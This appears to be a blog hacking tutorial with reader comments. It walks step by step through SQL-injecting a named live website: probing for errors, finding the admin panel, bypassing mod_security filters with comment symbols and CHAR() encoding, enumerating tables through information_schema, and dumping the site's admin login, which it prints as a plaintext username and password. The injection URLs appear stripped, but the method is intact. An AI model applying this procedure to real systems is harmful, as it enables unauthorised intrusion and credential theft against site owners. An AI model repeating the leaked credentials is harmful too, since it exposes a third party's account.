Before reading this u must read about sql injection !
I posted last time Click here to read..
http://www.gogame.co.in/
now we will check if this site is vulnerbale to sql injection or not !
just add ' this at the end of site url address !
http://www.gogame.co.in/
nothing change ?
try to add before number
http://www.gogame.co.in/
if still nothing happened to page the leave the site and move to next site !
but luckly i dont need to move to next site this site is vulnerable
http://www.gogame.co.in/
by adding this ' the result of page changed !
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by post DESC' at line 1
now you can see this msg on page !
mean this site can be hack !
------------------------------
step 2 :
finding admin panel !
now you will need to find the admin panel of this site to login as a administrator of this site !
admin panel is the area from where administrator of site login and Mainten the site
so for this there are some of tools available !
but for tutorial i will use this online admin finding site,
Click here For Online Admin Panel Finder
now we will paste the site link there
which is http://www.gogame.co.in/
and click on dump!
it will start finding admin panel of website after 2 or 3 minutes it will give you a result of process !
now
http://www.gogame.co.in/admin/ is in green color rest of all are red !
mean http://www.gogame.co.in/admin/ is the admin panel of this website !
now open this page
it asking us to enter username and password to login !
now we will find the username and password in next step !
------------------------------
step 3 :
now we need the username and password to login so we sill use
http://www.gogame.co.in/
this section again ! now write
http://www.gogame.co.in/
the page remain same ?
http://www.gogame.co.in/
same ?
continue this untill the error display on page !
http://www.gogame.co.in/
same!
http://www.area96.it/
unknown columns
mean there is no 5 column in this !
so there are 4 column !
we got the column we will find the vulnerbale column now !
write
http://www.gogame.co.in/
ops 403 forbidden !
mod security
now we will bypass this shit
acually words are forbidden like select !
when u hit enter it has to go through firewall and select is forbidden so it will denied the command
so we have to trick it by using our brain
in database / * ! ` ~ ( ) these kind of symbol are not supported !
so when we if we add an extra sybol with select firewall will allow it ! so we can trick it !
http://www.gogame.co.in/
bypassed
now u can see 2 3 4 at the page as vuln columns !
these three numbers are displayed on the page !
mean these three numbers are vulnerable columns !
now we will use these number to display username and password of website admin panel on the page !
now just change lil thing here !
choose any number from vulnerable column and change it to "group_concat(table_name)"
like i do
http://www.gogame.co.in/
and after 6 add "from Information_schema.tables"
like this
http://www.gogame.co.in/
now enter
ops
again 403 forbidden !
we need to trick some more words !
http://www.gogame.co.in/
function group_concat does not exist O_o
it seam like group_concat is not working so we will use only concat now
http://www.gogame.co.in/
bypassed
now instead of number 2 column it will show tables name ! like this one
CHARACTER_SETS,COLLATIONS,COLL
this mean it showing us the table name !
but we need user name and password which is located in the database of website
so we will use
database also to extract username and password !
http://www.gogame.co.in/
just add 1 more line after information_schema.tables
which is "where table_schema=database()"
like this
http://www.gogame.co.in/
now on the page !
it showing the database's tables !
Adminlogin
these are tables
now we will send the query to open adminlogin table !
change "(table_name)" to "(column_name)"
"information_schema.tables" to "information_schema.columns"
"table_schema" to "table_name"
and "database()" to "login"
but it will not work because it will not accept name of tables after "Table_name=" command
so we need to trick the site
so we will use decimal numbers instead of this table name!
we will convert the word Login to decimal numbers to it will accept it !
Click here for ASCII Converter
from here u can convert any word to hex decimal and binary so we will type L o g i n in the box ASCii convertor !
give space between everyword of login because website need spaced numbers !
and clock on convert !
it is showing us now the result in decimal box
which is
97 100 109 105 110 108 111 103 105 110
now change it to
CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)
just add "CHAR" and , after every 3 numbers !
now we will use this instead of login !
so it will be
http://www.gogame.co.in/
ops again 403
table_name is forbidden
bypass
http://www.gogame.co.in/
the page show the result
usnd pdgame
this mean these are the columns of table adminlogin
now we will simply send the query to give us the username and password on the page !
just change
"(column_name)" to "(usnd,0x3a,pdgame)"
and after "from" remove all words and add "adminlogin"
0x3a is converted form of : to get seprate answer of username and password !
and it would be
http://www.gogame.co.in/
the page show this result
kolgo:gamekol
mean
1st user is
username=kolgo
password=gamekol
now we have the password we will move to admin panel to hack website
Author: Mad Jack
Taaaankw Sir :)
ReplyDeleteTnx sir
ReplyDeleteit displaying only one column when using "column_name"
ReplyDeleteozm
ReplyDelete